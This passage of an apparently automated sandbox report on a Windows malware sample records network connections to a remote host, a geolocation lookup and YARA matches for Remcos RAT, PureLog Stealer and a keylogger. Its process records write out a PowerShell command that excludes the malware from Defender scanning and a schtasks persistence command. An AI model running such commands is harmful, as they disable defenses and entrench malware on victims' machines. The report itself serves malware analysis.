                                                                                                                                              Dec 5, 2024 18:27:01.031753063 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032040119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032331944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032479048 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032800913 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032809973 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032936096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.034101963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.042208910 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.046083927 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.064505100 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.066164970 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.077142000 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077568054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077877045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077994108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078025103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078748941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078911066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.079088926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.079098940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.126769066 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.128410101 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.128755093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.129865885 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.129965067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130179882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130218983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130285025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.165978909 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.169107914 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.176676989 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.178400040 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.184571028 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184658051 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184669971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184787989 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184881926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184941053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184977055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186152935 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186228037 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186372042 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186587095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.224081039 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.225753069 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.238535881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.241105080 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.246635914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246685982 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246840954 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246879101 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247045040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247163057 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247236967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248178959 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248236895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248426914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248500109 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248600960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.288912058 CET255949741192.3.64.152192.168.2.4
Dec 5, 2024 18:27:01.289006948 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.296782970 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.296964884 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.297010899 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.297105074 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.298197031 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.298299074 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.298398018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.298464060 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.298508883 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.316746950 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.318366051 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.344113111 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.344561100 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.344572067 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.344651937 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.346183062 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.346657991 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.361332893 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.362993956 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.408451080 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.410669088 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.436934948 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.437139034 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.437279940 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.437498093 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.438121080 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.438294888 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.438431025 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.438523054 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.438632965 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.455349922 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.456437111 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.456939936 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.457370996 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.460438013 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.483607054 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.483670950 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.486051083 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.486094952 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.488601923 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.488683939 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.488694906 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.491071939 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.491197109 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.493094921 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.493194103 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.493232012 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.531480074 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.531522036 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.534513950 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.535155058 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.537393093 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.537489891 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.540170908 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.540237904 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.540308952 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.543070078 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.543210030 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.576378107 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.576545000 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.577218056 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.577353954 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578036070 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578232050 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578249931 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578403950 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578610897 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.578671932 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.580502033 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.581087112 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.583230019 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.583240032 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.652436018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.652759075 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.699804068 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.845077991 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:01.964798927 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.967575073 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:01.974296093 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.037062883 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.085658073 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.085732937 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.086920023 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.086957932 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.088056087 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.088064909 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.088099003 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.089226961 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.089261055 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.090362072 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.090384960 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.094052076 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.159115076 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.171788931 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.173674107 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.237845898 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.248406887 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.250164986 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.279207945 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.279324055 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.291748047 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.291795015 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.291948080 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.291994095 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.292130947 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.292149067 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.292205095 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.293565035 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.293631077 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.293706894 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.293783903 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.293924093 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:27:02.299109936 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:27:02.301070929 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 18:25:41.483342886 CET | 192.168.2.4 | 1.1.1.1 | 0x8c22 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 18:25:41.633713961 CET | 1.1.1.1 | 192.168.2.4 | 0x8c22 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

HTTP Request Dependency Graph / HTTP Sessions

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 178.237.33.50 | 80 | 8072 | C:\Users\user\AppData\Roaming\DGlxtFUfY.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 18:25:41.833672047 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 5, 2024 18:25:43.074841022 CET | 1171 | IN | HTTP/1.1 200 OK
date: Thu, 05 Dec 2024 17:25:42 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
Target ID: 0
Start time: 12:25:28
Start date: 05/12/2024
Path: C:\Users\user\Desktop\LdSbZG1iH6.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LdSbZG1iH6.exe"
Imagebase: 0x850000
File size: 1'012'224 bytes
MD5 hash: B2618FBB2E344DBDC7D4B33947D71531
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                                                                                                                                              Imagebase:0x110000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                                                                                                                                              Imagebase:0x110000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                                                                                                                                              Imagebase:0x240000
                                                                                                                                              File size:187'904 bytes
                                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:8
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\LdSbZG1iH6.exe"
                                                                                                                                              Imagebase:0x800000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
